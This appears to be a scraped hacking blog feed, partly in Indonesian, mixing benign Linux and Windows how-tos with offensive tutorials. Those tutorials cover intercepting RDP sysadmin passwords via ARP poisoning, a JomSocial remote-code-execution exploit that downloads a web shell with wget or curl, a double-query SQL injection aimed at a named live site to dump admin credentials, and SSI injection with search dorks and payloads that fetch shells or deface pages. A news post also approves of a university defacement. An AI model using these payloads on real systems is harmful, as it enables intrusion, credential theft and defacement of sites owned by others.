Hack Like a Pro: How to Hack Remote Desktop Protocol (RDP) to Snatch the Sysadmin Password

Welcome back, my budding hackers!

One of the keys to becoming a professional and successful hacker is to think creatively. There is always a way to get into any network or system, if you think creatively. In previous tutorials, I have demonstrated ways to crack passwords on both Linux and Windows systems, but in this case, I will show you a way to get the sysadmin password by intercepting it from a Remote Desktop session.

As you know, RDP, better known as Remote Desktop Protocol, is a protocol that enables a sysadmin or tech support staff to take control of the end user's system to help or troubleshoot some issue or problem. When implemented correctly, interception of RDP traffic is difficult, but few companies implement it correctly. In fact, I have found that in MOST companies, RDP is vulnerable to the following attack, so pay close attention here as this attack is rather complex and requires your close attention and patience.

Note: We will be using Cain and Abel to conduct this MitM attack, so without a CACE Technologies proprietary wireless adapter, this attack will only work on a wired network.

Step 1: Enable RDP Server on a One System

First, we need a system with RDP enabled. If you are using this in your lab, enable one Windows machine's RDP server. Go to Control Panel thenSystem and Security. Below the System section, you will see "Allow remote access". Click there.

Next, click on the "Allow Remote Assistance connections to this computer" and click "Apply."

Step 2: Install Cain on Windows System

You should have Cain and Abel installed on your attack system. I have it on my Windows 7 system that I will be using to attack RDP on another Windows 7 system. In this case, we will not be using BackTrack as Cain and Abel is one of the few hacking tools developed originally for Windows and has never been ported to Linux.

Cain and Abel, besides being a great password cracking tool (albeit a bit slow) is probably the best MiTM tool on the market—and it is free!

Step 3: Use ARP Scan on Systems with Cain

Now that we have Cain and Abel running on our attack system and RDP server enabled on another, we need to do an ARP scan. In this way, we will find all the systems on the network by sending out ARP requests and the systems on the network will respond with their IP address and MAC addresses. Choose a range that is appropriate for your target network.

Step 4: ARP Poison

Next, now that know all the machines, IP addresses and MAC addresses on the network from the ARP scan, we are in a position to be able to poison the ARP. We poison the ARP so that our attack system sits between the RDP server and the RDP client. In this way, all of either machine's traffic must travel through our attack machine.

Click on the Sniffer button on Cain, then select the Sniffer tab, then select theHosts tab at the bottom, then click on the blue + on the top menu, select theRadio button, select the target IP range, and click OK.

Here, we see the hosts on the network.

Step 5: Choose the Server and Client You Want to Poison

Select the APR button at the bottom next to the hosts tab you used above, press the blue + button, select the targets, and press OK.

Step 6: Connect RDP Client to the RDP Server

Now, we wait for the RDP client to connect to the RDP server. This is likely to happen when an individual calls tech support and tech support needs to configure and demonstrate something on their machine. As you might guess, this requires some patience. When they do, we can then intercept its traffic.

Below, we are connecting to the RDP server called Null Byte.

Step 7: Intercept Traffic

With our Cain and Abel MiTM attack in place, all of the traffic between the RDP server and the RDP client will pass through our attack system.

Cain and Abel is now capturing the entire session and saving it into a file named in the far right column. We can now right click on that filename and choose View to open the decrypted file in Notepad.

Step 8: Search for Traffic

Now that all the traffic on the RDP connect is traveling through our attack system, we can search for traffic of interest to us.

Ideally, we want the sysadmin password for RDP. If we can find the sysadmin password for RDP, we will likely be able to use RDP on any of the network's machines as usually the sysadmin will set up RDP with the same password on every system for convenience.

Even better, many sysadmin use the same password to remote into client machines as they use on their system and other accounts. This means that when we capture this password we may own the entire domain and network!

To find any keys pressed in the hexadecimal file capture, use the Find feature in Notepad to search for "key pressed". This will find each of the keystrokes, one-by-one, of any keystrokes entered by the sysadmin including their password. This is tedious work, but you will be rewarded with a pot-of-gold for your patience!

Keep coming back my budding hackers as we continue to explore the wonderful world of hacking!

Tags: tutorial

Hack Like a Pro: How to Hack Remote Desktop Protocol (RDP) to Snatch the Sysadmin Password

By admin → Monday, March 31, 2014

how to install pitivi video editor in linux Kali

           Hy Friend, good night. On this night there was a bit of a way to install applications vidio editing in linux times. in this tutorial I use PiTiVi Video Editor for Video editing in Linux. First mate first download the file Pitivi VIDEO EDITOR friend can download it here Koetaradja48. If you're ready comrade Download files PiTiVi, we now begin to install PiTiVi, Him, True PiTiVi Video Editor Simple to install, only with 2 steps. Comrades can open a Terminal in Linux and the command:
                                                        apt-get update {enter}
                                                        apt-get install pitivi {enter}

Done friend. Simple 99%  
>>Source<< of the above ways I can from here on my own ... Next Source

     in this tutorial I created man, I worked with the Manual, if we work manually comrades, we must look for the tool first.

Ok guys,,,

comrade locate the file that we downloaded earlier
comrades can see my photos

Jika kawan sudah dapat sekarang kita perintah dpkg -i pitivi_0.15.2-0.1_all.deb { enter }

dpkg: error processing pitivi (--install):
 dependency problems - leaving unconfigured
Processing triggers for desktop-file-utils ...
Processing triggers for gnome-menus ...
Processing triggers for shared-mime-info ...
Processing triggers for hicolor-icon-theme ...
Processing triggers for man-db ...
Errors were encountered while processing:
 pitivi

if you have a friend fails (erorr), There is a solution to me. Although erorr when we dpkg-i pitivi_0.15.2-0.1_all.deb gnui existing PiTiVi Video Editor comrades in :

 Applications >> Sound & video> pitivi Video. 

Comrades could see first, the time at the old click not appear Pitivi Applications

Ok guys, now we fix the erorr . His buddy 's next command : apt - get install - f [ enter]

If you're ready comrade open select PiTiVi video here

Applications >> Sound & Video > Video pitivi { Click }

ok friend how to install pitivi video editor in linux time is ready , good luck ,

Regards Koetaradja48

Tags: tutorial

how to install pitivi video editor in linux Kali

By admin →

Aplikasi Radio IDCA untuk PC / Laptop

Selamat datang di blog kami :)
Kesempatan kali ini saya akan memberikan aplikasi Radio Streaming yang dibuat oleh teman saya Agam Bastard. Nih software memungkinkan buat dengerin radio tanpa harus buka browser segala, software ini juga dilengkapi dengan forum IDCA jadi bisa login forum dari sana

Tampilan Radio

Tampilan Forumnya

Gimana ? berminat silahkan download disini

Thanks To : Agam Bastard

Author : Bimo Septiawan

Tags: software

Aplikasi Radio IDCA untuk PC / Laptop

By admin →

JomSocial 2.6 - Remote Code Execution

Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode² berbahaya untuk mengeksploitasi web yg memakai komponen ini.

Bahan sebelum beraksi download bahannya :

☁ Exploit
☁ Python 27

Step- step :

♤ Install Python
♤ Open cmd
♤ Masuk dir dimana exploit berada
♤ Jalankan exploit


Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru

♤ Cara tanam shell

trik a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trik b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya disini.

Trimakasih,
Thanks to : Sanjungan Jiwa

Author : Bimo Septiawan

Tags: Defacing

JomSocial 2.6 - Remote Code Execution

By admin →

Cloud Cracker (Online WPA/WPA2 and Hash Cracker)

Cloud Cracker is an online password cracking service for penetration testers and network auditors who need to check the security of WPA protected wireless networks, crack password hashes or break document encryption. 

Features :: 

• Ease to use
• Save money, save time
• Support WPA/WPA2, NTLM, SHA-512, MD5, MS-CHAPv2 
• Secure transmission
• Fast password cracking service

Online Website :: https://www.cloudcracker.com/

Tags: Tools

Cloud Cracker (Online WPA/WPA2 and Hash Cracker)

By admin →

How to Install a themes in Kali linux

    Hey guys, this morning I want jelasin little way to install the theme at Kali linux, this tutorial Deini I get from my brother, and my little modification in my graffiti books, and tutorials are not the same anymore to have a brother Deini. Ok friend did not talk much longer we go straight to the center,

Ok first time companions Open a terminal in Linux. By way of Ctrl + Alt + T
  Then the friend command
root @ Koetaradja48 ~ # apt-get install gnome-tweak-tool (enter)

Can see photos of my friend

 Ok friends moat in see ya girl in that picture Focus to Tutorial: D

            If the friend is ready to install gnome-tweak-tool, so now we'll open the gnome-tweak-tool there are 2 ways. First friend can open the terminal with the command:
root @ Koetaradja48 ~ # gnome-tweak-tool (enter)
Can see photos of my friend

Or friend can also open the second way,
Click Applications> System Tools> Preferences> Advanced Settings and then click
Can see photos of my friend

Ok now we are looking for friends first theme . Go to Google Chromes or Mozilla Firefox

gnome look {enter }

Click GNOME - Look.org

Click GTK 3.x

Now friends find a theme that suits willingness friend ,
if it can be friends download

If you're ready download his companions , companions open the folder where the file was downloaded Friend, and then extract the appropriate file type application pal pal files , for example tar.gz
Friends can see my photos

Then copy the files companions themes to / usr / share / themes / or friends can also copy over the road at Kali linux terminal

open gnome-tweak-tool
Click Themes> GTK + Themes and select the name of the file that extracts friend

yess

Ok buddy finish, which my friend, your friend, buddy theme Coman under
ok buddy, I'll see you again in his next tutorial Greetings Koetaradja48

Tags: tutorial

How to Install a themes in Kali linux

By admin → Sunday, March 30, 2014

Cara Booting Windows 7 ke Flashdisk dengan manual

   hy guys, kembali lagi dengan saya KakekGalau, dari pada tidur  gak ada manfaat. ane coret-coret aja ni bloq gan.. ok agan tak bnyak basa-basi lagi.

Ok Kita mulaii :D

Klik menu start ketik Run, Atau dengan Super+r

agan Perintah ketik  diskpart {enter }

Jika sduah, agan perintah list disk { enter }




Selnjut'a agan perintah Select disk 1. Ok agan sedikit penjelasan, kenapa pada step ini saya memerintah select disk 1, karna pada disk 1 itu flaskdisk yang sya gunakan berukuran 7740mb., Jika punya agan-agan lebih besar lagi agan harus pilih yang besar :D Ok { enter }

Ok Kita clean dulu kawan,,,
  perintah clean { enter }

Ok selanjut-Nya create partition primary {enter]

Lanjut :D select partition 1 { enter }

lalu perintah active { enter }

ok Selanjut-Nya agan perintah format fs=fat32

Ok,, jika format sudah 100 Percent makan kawan-kawan perintah assign {enter }

jika kawan-kawan sudah perintah assign maka perintah lah exit { enter }


Ok Agan cara Booting manual sudah siap. sekarang agan harus copas file yang sudah di extra melalui file iso windows yang ada di laptop kawan,

Sedikit SS

Kawan-Kawan copas semua file ke flashdisk yang sudah kita booting tadi,, Reboot Komputer agan jika ingin installasi windows :D,
Selamat mencoba agan, Ok... sekian dan trimakasih :D

Tags: tutorial

Cara Booting Windows 7 ke Flashdisk dengan manual

By admin →

Sikkim Manipal University Site Hacked by Indian Hacker

One of the reputed education institute of India "Sikkim Manipal University" have been hacked and defaced by hacker with the online handle "Venki" from Indian Cyber Pirates.

On the deface page hackers left the message for site admin stating that, he had reported the multiple vulnerability to site admin but they haven't response to it. Hacker have not defaced the index page of the site rather he had uploaded his deface page on the directory of the site (http://smu.edu.in/resources/icp.htm). 

As we have contacted to hacker, he told us that he had reported the vulnerability to admin, but they haven't gave any response to him. He had just defaced to show the security issue. he noted that,

"I didn't cause any damage to the site or server, just taking site admin attention to its reports. This was just security alert to the site admin"

Hacker have told us that today also he had reported the security issue with the deface page link as a POC. And at the mean time site admin have patched the site and restore the deface page. Hope now they realised that a small reports can damage there system. 

Additionally, hackers also told us that he had access to the server database, and also have all the data of students, exam results details and other important data also. You can check the below screenshot provided by the hacker to us on our mail.

Sikkim Manipal University Database

Sikkim Manipal University is a co-educational public-private funded university located in Gangtok, Sikkim, India. It was established in 1995 and is the first government-private initiative in the region.

I have seen many times that hackers have reported security issue to the organisation but they haven't took any issue or didn't response to them. Sometime some site admin patched the loopholes but didn't response to the security reports.

This is big issue that if hackers are reporting a security issue on its system then organisation representative must respond to the reports, even if they didn't have any bounty program. If they respond to the reports this may help then to solve the security loopholes of their system.

Tags: Defacement

Sikkim Manipal University Site Hacked by Indian Hacker

By admin →

Strange Sql injection

hello friends,Today we are gonna see about double query based sql injection


this post is by Divakar K

• here is the url

             http://www.advance-acoustic.com/en/produits/index/detail/id/3/sec/1

• now find the injection point

• here is how i got the injection point

             http://www.advance-acoustic.com/en/produits/index/detail/id/3'/sec/1

• now the next step is to check whether we can extract database using union based command or not...but i don't get the details using the union based injection

• now we can learn about double query based sql injection

step 1: to find the current database name

COMMAND:

http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

• http://www.advance-acoustic.com/en/produits/index/detail/id/3+and%28select%201%20FROM%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28database%28%29%29%29%20FROM%20information_schema.tables%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29/sec/1

step 2:to find user name use user(), version-->version()

• you can get the list of database name using this command

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

in this command check for "LIMIT N,1"

you have to increment the N value from 0 to no.of databases in that site

ex:i used limit 0,1 

 -->limit 1,1

there are only two databases :-p

i can't increment further

this is how you get the list of databases

step 3: now to find the list of table in the particular database

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

<HEX_VLAUE_OF_DB_NAME>--->here our database name is advance

hex value is CHAR(97, 100, 118, 97, 110, 99, 101)

like the previous step you need to increment the N value to get the list of tables in that particular database

limit 1,1 gives admin table :-p

step 4: now the next step is to find column name for the admin table

+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

<HEX_VLAUE_OF_DB_NAME>----->CHAR(97, 100, 118, 97, 110, 99, 101)

<HEX_VLAUE_OF_TABLE_NAME>--->CHAR(97, 100, 109, 105, 110)

as like the previous step you need to increment the N value to get list of column name

limit 0,1-->username1

limit 1,1-->password1

step 5: last step is to dump the values :-p

+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)

Tags: tutorial

Strange Sql injection

By admin →

ssi server side include injection shell

hii
H4CK3R $P1D3R was here
today i will teach you SSI (server side include)

SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites,
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin ...

Dorks :


inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=




Try any dork or find sites manually,
To check vulenrablity of websites enter these commands in username and password

<!--#echo var="DATE_LOCAL" -->


it Will show the Date


<!--#exec cmd="whoami"-->


it Will display which user is running on the server


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)


it Will show all files in the directory


<!-- #exec cmd="dir" --> (Windows)


it Will display all files in the directory

for example enter


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


in username and password to view all files of website


now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password

<!--#exec cmd="wget http://website.com/deface.html" -->


to view your deface page goto site.com/deface.html

to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login


<!--#exec cmd="wget http://website.com/abc.txt" -->


to check your txt file is uploaded or not list all files using


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


now you have to chnage .txt extention to .php
to rename your txt file to php use this command

<!--#exec cmd="mv abc.txt abc.php" -->


now goto site.com/abc.php and acess your shell.

Tags: Exploit

ssi server side include injection shell

By admin →